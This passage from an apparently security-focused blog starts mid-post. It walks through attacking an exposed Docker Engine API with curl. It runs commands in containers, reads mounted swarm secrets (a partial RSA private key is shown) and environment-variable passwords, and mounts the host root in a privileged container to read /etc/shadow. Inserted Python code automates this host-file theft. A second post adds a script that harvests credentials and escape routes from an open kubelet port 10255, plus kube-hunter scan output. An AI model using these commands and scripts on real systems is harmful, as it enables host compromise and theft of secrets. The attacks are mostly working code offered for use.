<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "UpdatedAt": "2018-07-06T10:19:50.677702428Z",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Spec": {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Name": "registry-key.key",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Labels": {} }},</span><br />
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">Check what is mounted</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}'</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> {"Id":"7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa"}</span></span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">Get the output by starting the exec</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}'</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">overlay on / type overlay </span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">---SNIP---</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda2 on /var/lib/registry type ext4 (rw,relatime,errors=remount-ro,data=ordered)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><b>tmpfs on /run/secrets/registry-cert.crt type tmpfs (ro,relatime)</b></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><b>tmpfs on /run/secrets/htpasswd type tmpfs (ro,relatime)</b></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><b>tmpfs on /run/secrets/registry-key.key type tmpfs (ro,relatime)</b></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">---SNIP---</span><br />
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">Cat the mounted secret</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}'</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> {"Id":"3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30"}</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30/start -d '{}'</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> -----BEGIN RSA PRIVATE KEY-----</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">MIIJKAIBAAKCAgEA1A/ptrezfxUlupPgKd/kAki4UlKSfMGVjD6GnJyqS0ySHiz0</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">---SNIP---</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">If you have secrets, it's also worth checking out services in case they are adding secrets via environment variables</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> curl -s --insecure https://tls-opendocker.socket:2376/services | jq</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> [{</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "ID": "amxjs243dzmlc8vgukxdsx57y",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Version": {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Index": 6417</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> },</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "CreatedAt": "2018-04-16T19:51:20.489851317Z",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "UpdatedAt": "2018-12-07T13:44:36.6869673Z",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Spec": {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Name": "app_REMOVED",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Labels": {},</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "TaskTemplate": {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "ContainerSpec": {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Image": "dpage/pgadmin4:latest@sha256:5b8631d35db5514d173ad2051e6fc6761b4be6c666105f968894509c5255c739",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Env": [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "PGADMIN_DEFAULT_EMAIL=REMOVED<removed>@gmail.com",</removed></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "PGADMIN_DEFAULT_PASSWORD=REMOVED"<removed></removed></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ],</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Isolation": "default"</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: inherit;"> Creating a container that has mounted the host file system</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "<b>Binds": [ "/:/mnt" ]</b>, <b>"Privileged": true</b>}'</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">{"Id":"0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192","Warnings":null}</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=test</span></span><br />
<span style="color: #444444;"><span style="font-family: inherit; font-size: x-small;"><br /></span>
<span style="font-family: inherit; font-size: xx-small;">Read something from the host</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">{"Id":"140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6"}</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}'</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">root:$6$THEPASSWORDHASHWUZHERE:17717:0:99999:7:::</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">daemon:*:17001:0:99999:7:::</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">bin:*:17001:0:99999:7:::</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">sys:*:17001:0:99999:7:::</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">sync:*:17001:0:99999:7:::</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">games:*:17001:0:99999:7:::</span><br />
<span style="color: #444444;"><br /></span>
<br />
<div>
<b><span style="color: #444444; font-family: inherit;">Cleanup</span></b></div>
<div>
<span style="color: #444444; font-family: inherit;"><br /></span></div>
<div>
<span style="color: #444444; font-family: inherit;">Stop the container</span></div>
<div>
<span style="color: #444444;"><br /></span></div>
<div>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop</span></div>
<div>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="color: #444444; font-family: inherit;">delete stopped containers</span></div>
<div>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune</span></div>
<div>
<span style="color: #444444;"><br /></span></div>
<div>
<span style="color: #444444;"><br /></span></div>
<div>
<br /></div>
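<div><span style="color: #444444;">The curl workflow above (create an exec and start it, inspect mounts for swarm secrets, review service environment variables, create a privileged container with the host root bound at /mnt, then clean up) as one small stdlib-only Python client. This is an added example, not code from the original post. Assumed, not taken from the post: the daemon base URL (e.g. https://tls-opendocker.socket:2376) accepts requests without a client certificate, and TLS verification is disabled as curl --insecure does. The demux() function shows something curl hides: a non-TTY exec stream is framed with 8-byte headers, which is why raw curl output of an exec contains stray bytes. The sample mount and service data are constructed for the example.</span></div>

```python
"""Added example, not code from the original post: the curl workflow above as a
stdlib-only Python client. Assumed, not taken from the post: the daemon base URL
(e.g. https://tls-opendocker.socket:2376) accepts requests without a client
certificate, and TLS verification is disabled as curl --insecure does."""
import json
import ssl
import struct
import urllib.request

# Equivalent of curl --insecure: skip certificate and hostname checks.
_CTX = ssl.create_default_context()
_CTX.check_hostname = False
_CTX.verify_mode = ssl.CERT_NONE

SUSPICIOUS = ("PASS", "SECRET", "TOKEN", "KEY", "CREDENTIAL")

# Constructed samples (not real daemon output) so the parsers run offline.
SAMPLE_MOUNT = ("proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)\n"
                "tmpfs on /run/secrets/htpasswd type tmpfs (ro,relatime)\n"
                "tmpfs on /run/secrets/registry-key.key type tmpfs (ro,relatime)\n")
SAMPLE_SERVICES = [{"Spec": {"Name": "app_demo", "TaskTemplate": {"ContainerSpec": {
    "Env": ["PGADMIN_DEFAULT_EMAIL=admin@example.com",
            "PGADMIN_DEFAULT_PASSWORD=example"]}}}}]


def api(base, path, body=None, method=None):
    """One Engine API request; returns the raw response body."""
    data = None if body is None else json.dumps(body).encode()
    req = urllib.request.Request(
        base + path, data=data,
        method=method or ("POST" if data is not None else "GET"),
        headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, context=_CTX) as resp:
        return resp.read()


def demux(stream):
    """Split a non-TTY exec/attach stream into (stdout, stderr) bytes.
    Each frame: 1 byte stream type (1 stdout, 2 stderr), 3 zero bytes,
    big-endian uint32 payload length, then the payload."""
    out, err, pos = b"", b"", 0
    while pos + 8 <= len(stream):
        kind = stream[pos]
        size = struct.unpack(">I", stream[pos + 4:pos + 8])[0]
        frame = stream[pos + 8:pos + 8 + size]
        if kind == 2:
            err += frame
        else:
            out += frame
        pos += 8 + size
    return out, err


def exec_in_container(base, container_id, cmd):
    """The post's two-step exec: create the exec, then start it to get output."""
    spec = {"AttachStdin": False, "AttachStdout": True, "AttachStderr": True,
            "Cmd": ["/bin/sh", "-c", cmd]}
    exec_id = json.loads(api(base, f"/containers/{container_id}/exec", spec))["Id"]
    out, err = demux(api(base, f"/exec/{exec_id}/start", {}))
    return out.decode(errors="replace"), err.decode(errors="replace")


def secret_mounts(mount_output):
    """Mount points under /run/secrets (swarm secrets show up as ro tmpfs)."""
    paths = []
    for line in mount_output.splitlines():
        fields = line.split()
        if len(fields) > 2 and fields[2].startswith("/run/secrets/"):
            paths.append(fields[2])
    return paths


def env_secrets(services):
    """(service name, VAR=value) for credential-looking variables in the
    ContainerSpec.Env of each entry returned by GET /services."""
    hits = []
    for svc in services:
        spec = svc.get("Spec", {})
        env = spec.get("TaskTemplate", {}).get("ContainerSpec", {}).get("Env") or []
        for item in env:
            if any(w in item.split("=", 1)[0].upper() for w in SUSPICIOUS):
                hits.append((spec.get("Name"), item))
    return hits


def read_host_file(base, path, image="alpine"):
    """Privileged container with / bound at /mnt, read one host file, then
    remove only that container (DELETE by id, not /containers/prune)."""
    cfg = {"Image": image, "Cmd": ["/bin/sh", "-c", "sleep 3600"],
           "HostConfig": {"Binds": ["/:/mnt"], "Privileged": True}}
    cid = json.loads(api(base, "/containers/create", cfg))["Id"]
    try:
        api(base, f"/containers/{cid}/start", {})
        return exec_in_container(base, cid, f"cat /mnt{path}")[0]
    finally:
        api(base, f"/containers/{cid}?force=true", method="DELETE")
```

<div><span style="color: #444444;">Usage against a live daemon would be read_host_file("https://tls-opendocker.socket:2376", "/etc/shadow"); the parsers can be exercised offline on SAMPLE_MOUNT and SAMPLE_SERVICES. Cleanup deletes only the container this script created, so other stopped containers on the target are left alone.</span></div>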
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-14465291686942328242019-01-16T09:00:00.002-05:002019-01-16T09:00:13.112-05:00Kubernetes: Kube-Hunter 10255Below is some sample output, mainly to show what an exposed kubelet read-only port (10255) gives you and what it looks like. Probably of most interest is the /pods endpoint<br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4nSvm65ri_pWBpQVBvd9TW1L1Auz9JxpeGXSz8_trLBt_qPVBWOsu_mdTmuGv45Pyj87Q5X3HYF9zgqfC8OgwcPglp_gaOLPRl6KCfdyI4iznOkMDtYCKNPRDg5Ul6owmWv_q09mDI5w/s1600/10255-pods.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" data-original-height="620" data-original-width="1600" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4nSvm65ri_pWBpQVBvd9TW1L1Auz9JxpeGXSz8_trLBt_qPVBWOsu_mdTmuGv45Pyj87Q5X3HYF9zgqfC8OgwcPglp_gaOLPRl6KCfdyI4iznOkMDtYCKNPRDg5Ul6owmWv_q09mDI5w/s400/10255-pods.png" width="400" /></span></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">or the /metrics endpoint</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPH9cxKELFMg0FJSfZPiCCi42KXvsHFmQziPuXlVykgVN8QZukd1R2_GOaQXa3pP9MroGVQtkmQkrDeKcjBIuZly4-LHvDlgRLqqYqsGjVSCLKH60ruRl36b-ElCOJDZesxJ7cxB34XqY/s1600/10255-metrics.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="442" data-original-width="1600" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPH9cxKELFMg0FJSfZPiCCi42KXvsHFmQziPuXlVykgVN8QZukd1R2_GOaQXa3pP9MroGVQtkmQkrDeKcjBIuZly4-LHvDlgRLqqYqsGjVSCLKH60ruRl36b-ElCOJDZesxJ7cxB34XqY/s400/10255-metrics.png" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
or the /stats endpoint</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl1ljCXGAMAIJnsdELUYoPXxZnTrgu0padIJ_mIV_ca3cZJ7UiyHaXgP-3nUKlIblf5eKT82auiLJ3pWb4EmuW0FkHo03UuIw2ARqsYPOfzfHjIllntkb-J3CTvGWIdixIrlPeF_0ePz4/s1600/10255-stats.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1306" data-original-width="1600" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl1ljCXGAMAIJnsdELUYoPXxZnTrgu0padIJ_mIV_ca3cZJ7UiyHaXgP-3nUKlIblf5eKT82auiLJ3pWb4EmuW0FkHo03UuIw2ARqsYPOfzfHjIllntkb-J3CTvGWIdixIrlPeF_0ePz4/s400/10255-stats.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
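<div><span style="color: #444444;">The /pods endpoint returns a full PodList for everything scheduled on that node, so the useful next step after kube-hunter flags it is to triage that JSON rather than read it by hand. The script below, an added example and not part of the original post or of kube-hunter, fetches /pods over plain HTTP and pulls out what an attacker checks first: container images, privileged containers, hostPath volumes, credential-looking environment variables with inline values, hostNetwork and the service account. Assumed, not from the post: the node address, and that the port serves a standard Kubernetes v1 PodList. The PodList embedded in the script is constructed for the example.</span></div>

```python
"""Added example, not code from the original post: fetch the unauthenticated
/pods listing from a kubelet read-only port (10255) and triage it for what an
attacker looks at first. Assumed, not from the post: the node address, and
that the port serves a standard Kubernetes v1 PodList as the kubelet does."""
import json
import urllib.request

SUSPICIOUS = ("PASS", "SECRET", "TOKEN", "KEY", "CREDENTIAL")

# Constructed PodList (not real cluster output) so triage_pods runs offline.
SAMPLE_PODLIST = {
    "kind": "PodList", "apiVersion": "v1",
    "items": [{
        "metadata": {"name": "db-backup", "namespace": "default"},
        "spec": {
            "hostNetwork": True, "serviceAccountName": "default",
            "volumes": [{"name": "root", "hostPath": {"path": "/"}}],
            "containers": [{
                "name": "backup", "image": "postgres:11",
                "securityContext": {"privileged": True},
                "env": [{"name": "PGPASSWORD", "value": "hunter2"},
                        {"name": "PGHOST", "value": "db"},
                        # valueFrom refs carry no plaintext, so they are not reported
                        {"name": "API_TOKEN", "valueFrom": {
                            "secretKeyRef": {"name": "api", "key": "token"}}}]}]}}]}


def fetch_pods(node, port=10255, timeout=5):
    """GET http://node:port/pods: plain HTTP, no authentication on this port."""
    with urllib.request.urlopen(f"http://{node}:{port}/pods", timeout=timeout) as resp:
        return json.loads(resp.read())


def triage_pods(podlist):
    """One finding per pod: images, privileged containers, hostPath volumes,
    credential-looking env values, hostNetwork and the service account."""
    findings = []
    for pod in podlist.get("items", []):
        meta, spec = pod.get("metadata", {}), pod.get("spec", {})
        finding = {
            "pod": f"{meta.get('namespace')}/{meta.get('name')}",
            "images": [], "privileged": [], "host_paths": [], "env": [],
            "host_network": bool(spec.get("hostNetwork")),
            "service_account": spec.get("serviceAccountName"),
        }
        for vol in spec.get("volumes", []):
            if "hostPath" in vol:
                finding["host_paths"].append(vol["hostPath"].get("path"))
        for c in spec.get("containers", []) + spec.get("initContainers", []):
            finding["images"].append(c.get("image"))
            if (c.get("securityContext") or {}).get("privileged"):
                finding["privileged"].append(c.get("name"))
            for e in c.get("env", []):
                name = e.get("name", "").upper()
                if "value" in e and any(w in name for w in SUSPICIOUS):
                    finding["env"].append(f"{e['name']}={e['value']}")
        findings.append(finding)
    return findings


if __name__ == "__main__":
    import sys
    # Pass a node address to query a live port; otherwise triage the sample.
    pods = fetch_pods(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_PODLIST
    for finding in triage_pods(pods):
        print(json.dumps(finding))
```

<div><span style="color: #444444;">Only env entries with an inline value are reported; entries using valueFrom reference a Secret or ConfigMap and the read-only port never returns those contents. Privileged containers and hostPath mounts of / are the ones to pursue, since either gives a route from a pod to the node.</span></div>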
<span style="font-family: inherit; font-size: xx-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">$ ./kube-hunter.py</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Choose one of the options below:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">1. Remote scanning (scans one or more specific IPs or DNS names)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">2. Subnet scanning (scans subnets on all local network interfaces)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">3. IP range scanning (scans a given IP range)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Your choice: 1</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Remotes (separated by a ','): 1.2.3.4</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">~ Started</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">~ Discovering Open Kubernetes Services...</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Etcd:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: open service</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| service: Etcd</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ host: 1.2.3.4:2379</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| API Server:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: open service</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| service: API Server</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ host: 1.2.3.4:443</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| API Server:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: open service</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| service: API Server</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ host: 1.2.3.4:6443</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Etcd Remote version disclosure:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: vulnerability</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| host: 1.2.3.4:2379</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| description:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Remote version disclosure might give an</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ attacker a valuable data to attack a cluster</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Etcd is accessible using insecure connection (HTTP):</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: vulnerability</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| host: 1.2.3.4:2379</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| description:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Etcd is accessible using HTTP (without</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| authorization and authentication), it would allow a</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| potential attacker to</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| gain access to</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ the etcd</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Kubelet API (readonly):</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: open service</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| service: Kubelet API (readonly)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ host: 1.2.3.4:10255</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Etcd Remote Read Access Event:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: vulnerability</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| host: 1.2.3.4:2379</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| description:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Remote read access might expose to an</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ attacker cluster's possible exploits, secrets and more.</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| K8s Version Disclosure:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: vulnerability</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| host: 1.2.3.4:10255</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| description:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| The kubernetes version could be obtained</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ from logs in the /metrics endpoint</span><br />
